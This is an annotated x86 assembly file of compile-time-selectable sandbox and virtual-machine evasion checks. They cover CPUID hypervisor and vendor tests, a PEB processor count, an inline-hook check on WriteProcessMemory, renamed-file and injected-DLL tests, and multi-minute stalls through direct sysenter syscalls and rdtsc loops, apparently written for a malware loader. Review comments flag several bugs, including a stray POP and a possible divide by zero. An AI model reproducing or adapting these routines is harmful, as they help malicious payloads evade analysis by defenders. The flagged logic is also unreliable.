; Should go to the end without RETing to win !
; ********************************************
; **
; ** Virtualisation Based
; **
; ********************************************
; Only allow Intel CPUs
%ifdef NOSB_INTELONLY
; Vendor check via CPUID leaf 0. EDX carries the "ineI" dword of the
; "GenuineIntel" vendor string; anything else makes this fragment `ret`
; (file convention: `ret` = check failed, fall-through = keep going).
; Clobbers eax, ebx, ecx, edx (cpuid).
mov eax,0
cpuid
cmp edx,0x49656E69 ; "ineI" (second dword of "GenuineIntel")
je _isintel
ret ; not an Intel vendor string -> fail
_isintel:
%endif
%ifdef NOSB_NOL1ICACHE
; Validate that an L1 instruction cache is reported.
; Walks the deterministic cache descriptors of CPUID leaf 4, one subleaf
; per pass (edx = subleaf index, preserved across cpuid via push/pop).
; Per descriptor: EAX[4:0] = cache type (2 = instruction), EAX[7:5] = level.
; A type-2/level-1 entry falls through; the walk stops via `loop` when the
; extracted level is 0 (a null descriptor), which reaches the `ret`.
; Clobbers eax, ebx, ecx, edx.
mov edx,0
_isnot_nol1_first:
mov eax,4
mov ecx,edx
push edx
cpuid
pop edx
inc edx ; next subleaf for the following pass
mov ecx,eax ; ecx will hold the cache level
shr ecx,5
and ecx,7 ; ecx = level (EAX bits 7:5)
and eax,0x1f ; eax = type (EAX bits 4:0)
cmp eax,2
jne _isnot_nol1_next ; type 2 is an instruction cache
cmp ecx,1 ; we seek level 1
je _isnot_nol1 ; L1 instruction cache found -> keep going
_isnot_nol1_next:
inc ecx
; NOTE: `loop` counts down ecx (= level + 1), not the type as the
; original note suggested: a level-0 descriptor ends the walk.
loop _isnot_nol1_first ; non-null descriptor -> examine the next cache
ret ; reached only if no L1 instruction cache was found
_isnot_nol1:
%endif
%ifdef NOSB_HYPERBIT
; --------
; Test for the hypervisor-present bit (CPUID leaf 1, ECX bit 31).
; Bit set -> a hypervisor announces itself -> fail (`ret`).
; Clobbers eax, ebx, ecx, edx.
mov eax,1
cpuid
bt ecx,31 ; CF = hypervisor-present flag
jnc _isnot_hyper
ret ; hypervisor bit set -> fail
_isnot_hyper:
%endif
%ifdef NOSB_UNSLEAF
; --------
; Test that an unsupported extended CPUID leaf is not all-zero on Intel.
; 1. Leaf 0x80000000 returns the highest extended leaf in EAX; anything
;    below 0x80000005 fails outright.
; 2. The first unsupported leaf (max + 1) is queried; if all four output
;    registers sum to zero the check fails. The check is skipped on a
;    non-"Genu" vendor string (leaf 0, EBX).
; Clobbers eax, ebx, ecx, edx; stack balanced (one push/pop pair).
mov eax,0x80000000
cpuid ; max extended leaf; expected >= 0x80000005 since P4 (per author)
cmp eax,0x80000005
jnb _isnot_Unleaf_mid
ret ; too few extended leaves -> fail
_isnot_Unleaf_mid:
inc eax ; eax = first unsupported extended leaf
push eax ; keep it across the vendor query below
xor eax,eax
cpuid
cmp ebx,0x756E6547 ; "Genu" (first dword of "GenuineIntel")
pop eax ; pop does not touch flags; jne still sees the cmp result
jne _isnot_Unleaf ; only meaningful on Intel -> skip otherwise
cpuid ; query the unsupported leaf
add eax,ebx
add eax,ecx
add eax,edx
jnz _isnot_Unleaf ; non-zero output -> keep going
ret ; all four registers zero on the unsupported leaf -> fail
_isnot_Unleaf:
%endif
%ifdef NOSB_PEBCOUNT
; --------
; Test the processor count recorded in the PEB.
; `PEB` is a symbol defined outside this file (assumed to hold the PEB
; address); offset 0x64 is read as the 32-bit PEB NumberOfProcessors field.
; A count of exactly 1 fails (`ret`); any other value keeps going.
; Clobbers eax, ebx.
mov ebx,[PEB]
mov eax,[ebx+0x64] ; PEB.NumberOfProcessors (32-bit layout)
dec eax
jnz _isnot_pebuniq ; count != 1 -> keep going
ret ; single processor reported -> fail
_isnot_pebuniq:
%endif
%ifdef NOSB_HYPSTR
; --------
; Test for a hypervisor vendor string (CPUID leaf 0x40000000).
; Each byte of the returned ECX, then of a second dword, is checked to be
; in the range 32 (' ') .. 122 ('z'). Any byte outside that range exits
; the check (no readable string); eight in-range bytes reach the `ret`.
; Clobbers eax, ebx, ecx, edx; see the stack note at POP EAX below.
MOV EAX,0x40000000 ; hypervisor vendor leaf
CPUID
MOV EAX,ECX
MOV ECX,0x4
_hyperstr_loopA: ; test the 4 bytes of ECX
CMP AL,32 ; below ' ' -> not printable
JB _isnot_hyperstr
CMP AL,122 ; above 'z' -> not printable
JA _isnot_hyperstr
SHR EAX,8 ; next byte
LOOP _hyperstr_loopA
mov ecx,4
MOV EAX,EBX
; NOTE(review): this POP overwrites the EBX value just loaded and removes
; a dword from the stack that this block never pushed; the second loop
; therefore tests the popped dword, not EBX — confirm intent.
POP EAX
_hyperstr_loopB: ; test the 4 bytes now in EAX
CMP AL,32
JB _isnot_hyperstr
CMP AL,122
JA _isnot_hyperstr
SHR EAX,8 ; next byte
LOOP _hyperstr_loopB
ret ; all eight bytes printable -> vendor string present -> fail
_isnot_hyperstr:
%endif
; ********************************************
; **
; ** Sandbox Detection Based
; **
; ********************************************
%ifdef NOSB_HOOKPROC
; Inline-hook check on WriteProcessMemory.
; `invokel`, `_getdll`, `_getfunction` and the HASH_* constants are defined
; outside this file (presumably a hash-based export resolver; eax = result).
; The first four bytes of the resolved function are compared with
; 8B FF 55 8B (`mov edi,edi / push ebp / mov ebp,esp`, the standard
; hot-patchable prologue). A different prologue fails the check.
invokel _getdll,HASH_KERNEL32.DLL
invokel _getfunction, eax, HASH_WRITEPROCESSMEMORY
cmp dword [eax],0x8B55FF8B ; expected untouched prologue bytes
je _nosbhookproc
ret ; prologue bytes differ (assumed patched) -> fail
_nosbhookproc:
%endif
%ifdef NOSB_SYSSLEEP
; Direct-syscall delay (no API call). The delay value is stored inline in
; the code stream and jumped over. Arguments are pushed in the order the
; callee expects them (DelayInterval pointer, Alertable = 0), followed by
; two return addresses, then eax = syscall number and edx = esp for
; `sysenter`. The author notes the number is valid for 32-bit XP only.
jmp _syssleepstart
align 8
; 10 s expressed in 100 ns units; negative = relative delay.
; NOTE(review): only one dword is defined here — confirm against the
; size the callee expects.
syssleepval dd - 10 * (10000 * 1000); 10 s
_syssleepstart:
push syssleepval ; pointer to the delay value
push 0 ; Alertable = FALSE; relative time selected by the negative value
push _syssleepend ; return address
push _syssleepend ; second return address, emulating the return into the NtDelayExecution stub
mov eax,0x003b ; NtDelayExecution service number on 32-bit XP only (per author)
mov edx,esp ; user stack pointer handed to the kernel; see http://j00ru.vexillium.org/ntapi/
sysenter ; enter the kernel
_syssleepend:
; NOTE(review): four dwords were pushed but 12 bytes are released;
; presumably the sysenter return path consumes one — confirm.
add esp, 4*3
%endif
%ifdef NOSB_HSLEEP
; API-based delay: resolves NtDelayExecution by hash (via the external
; `_getdll` / `_getfunction` helpers) and calls it with Alertable = 0 and
; a pointer to the inline delay value.
jmp _hsleepstart
align 8
; -1,800,000,000 x 100 ns = 180 s (3 min); negative = relative delay.
; NOTE(review): only one dword is defined here — confirm against the
; size the callee expects.
hsleepval dd -1800000000
_hsleepstart
invokel _getdll,HASH_KERNEL32.DLL
invokel _getfunction, eax, HASH_NTDELAYEXECUTION
invokel eax, 0, hsleepval ; (Alertable = 0, &hsleepval), negative = relative
%endif
%ifdef NOSB_CPUIDCOUNT
; Timing comparison of a CPUID loop against a NOP loop, read with rdtsc.
; First pass: 0xffff iterations of `cpuid` leaf 1, then rdtsc.
; NOTE(review): no rdtsc is taken before the first loop; the value popped
; into ecx after it is the eax that was pushed on entry — confirm intent.
; Second pass: 0xffff iterations of `nop`, then rdtsc, minus the first
; result (+0x300000). The check fails (`ret`) unless the second figure
; is strictly above the first (unsigned compare).
; Clobbers eax, ebx, ecx, edx; stack balanced on both exit paths.
mov ecx,0xffff
push eax ; entry-time eax, popped into ecx below
_CPUID_LOOP:
push ecx ; cpuid clobbers ecx, so preserve the counter
mov eax,1
cpuid
pop ecx
loop _CPUID_LOOP
rdtsc
pop ecx
sub eax,ecx
add eax,0x300000 ; slack added to the first figure
push eax ; copy 1: compared against at the end
mov ecx,0xffff
push eax ; copy 2: subtracted from the second rdtsc
_CPUID_LOOP2:
push ecx
mov eax,1
nop ; same loop shape, no cpuid
pop ecx
loop _CPUID_LOOP2
rdtsc
pop ecx
sub eax,ecx ; second rdtsc minus copy 2
pop ebx ; copy 1
cmp eax,ebx
ja _isnot_cpuidcount ; unsigned: second figure larger -> keep going
ret ; otherwise fail
_isnot_cpuidcount:
%endif
%ifdef NOSB_RENAMED
; Fails if the own module cannot be found under its expected name.
; `_getdll` (external) looks the module up by name hash; a zero result
; means the file was renamed before execution.
invokel _getdll, HASH_NOSB_RENAMED.EXE ; refuses to run under a renamed file
test eax,eax
jne _renamed_nosandbox ; module found -> keep going
ret ; not found under the expected name -> fail
_renamed_nosandbox:
%endif
%ifdef NOSB_ROGUEDLL
; Fails if ws2_32.dll is already loaded in the process. The lookup is by
; name hash through the external `_getdll`; a non-zero result (module
; present, though this code never loads it) is treated as a foreign
; injection and fails the check.
invokel _getdll, HASH_WS2_32.DLL
test eax,eax
jz _dll_nosandbox ; not loaded -> keep going
ret ; unexpectedly loaded -> fail
_dll_nosandbox:
%endif
; 3 min busy-wait, with only 2 API calls (GetTickCount twice).
%ifdef NOSB_RDTSCLOOP
; Layout: `_rdtscsleeploop` is a real subroutine (its `ret` is a normal
; return, not this file's "check failed" convention), placed before the
; entry point and jumped over. One call spins until the low 32 bits of
; the TSC wrap below the starting value and then climb back above it,
; i.e. roughly one full wrap of the low dword. The entry point times one
; such call in milliseconds with GetTickCount, divides 180000 ms by it to
; get the number of calls needed, and repeats the call that many times.
; Clobbers eax, ebx, ecx, edx; stack balanced.
jmp _rdtsc_start
_rdtscsleeploop:
rdtsc
mov ecx,eax ; ecx = starting TSC low dword
_timing1:
push ecx ; cpuid clobbers ecx
cpuid ; serialising filler, leaf = whatever eax holds
rdtsc
pop ecx
cmp eax,ecx
jae _timing1 ; spin while TSC low >= start (until it wraps)
_timing2:
push ecx
cpuid
rdtsc
pop ecx
cmp eax,ecx
jb _timing2 ; spin while TSC low < start (until it passes start again)
ret ; subroutine return to the caller below
_rdtsc_start:
invokel _getdll,HASH_KERNEL32.DLL
invokel _getfunction, eax, HASH_GETTICKCOUNT
call eax
push eax ; tick count before the calibration call
call _rdtscsleeploop
invokel _getdll,HASH_KERNEL32.DLL
invokel _getfunction, eax, HASH_GETTICKCOUNT
call eax
pop ebx
sub eax,ebx ; milliseconds one loop took
mov ecx,eax
mov edx,0 ; edx:eax dividend; high dword zero
mov eax,180000 ; 3 min in milliseconds
; NOTE(review): a zero-millisecond calibration leaves ecx = 0 here and
; idiv would fault — no guard is present.
idiv ecx ; how many loops are needed
mov ecx,eax
dec ecx ; one loop already done during calibration
_rdtscwait:
push ecx ; the subroutine clobbers ecx
call _rdtscsleeploop
pop ecx
loop _rdtscwait
%endif